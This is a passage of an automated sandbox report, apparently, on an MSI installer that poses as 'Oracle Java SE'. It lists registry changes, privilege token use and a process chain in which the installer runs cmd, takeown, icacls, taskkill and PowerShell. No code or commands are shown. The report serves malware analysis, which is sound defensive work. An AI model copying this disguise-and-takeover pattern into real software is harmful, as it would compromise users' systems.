Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\4283AD5241F3747428B68F1D87E32188\3D88EA3CC1A0467488E5B6F3617FDD84 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\3D88EA3CC1A0467488E5B6F3617FDD84 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\3D88EA3CC1A0467488E5B6F3617FDD84\ProductFeature C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\Version = "134217999" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\ProductIcon = "C:\\Windows\\Installer\\{C3AE88D3-0A1C-4764-885E-6B3F16F7DD48}\\Logo.ico" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\PackageName = "4c11285fc4be4ffa97a866fbc13bbd83_JaffaCakes118.msi" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\ProductName = "Oracle Java SE" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\PackageCode = "9CC889D6EA63DC94DA730B4082DA0DA1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\4283AD5241F3747428B68F1D87E32188 C:\Windows\system32\msiexec.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\syswow64\MsiExec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3712 wrote to memory of 2656 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3712 wrote to memory of 2656 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3712 wrote to memory of 2656 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3712 wrote to memory of 408 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3712 wrote to memory of 408 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3712 wrote to memory of 408 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 408 wrote to memory of 3876 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\syswow64\cmd.exe
PID 408 wrote to memory of 3876 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\syswow64\cmd.exe
PID 408 wrote to memory of 3876 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\syswow64\cmd.exe
PID 3876 wrote to memory of 3096 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 3876 wrote to memory of 3096 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 3876 wrote to memory of 3096 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 3876 wrote to memory of 3476 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 3876 wrote to memory of 3476 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 3876 wrote to memory of 3476 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 3876 wrote to memory of 5056 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3876 wrote to memory of 5056 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3876 wrote to memory of 5056 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3876 wrote to memory of 3024 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 3876 wrote to memory of 3024 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 3876 wrote to memory of 3024 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 3876 wrote to memory of 1800 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
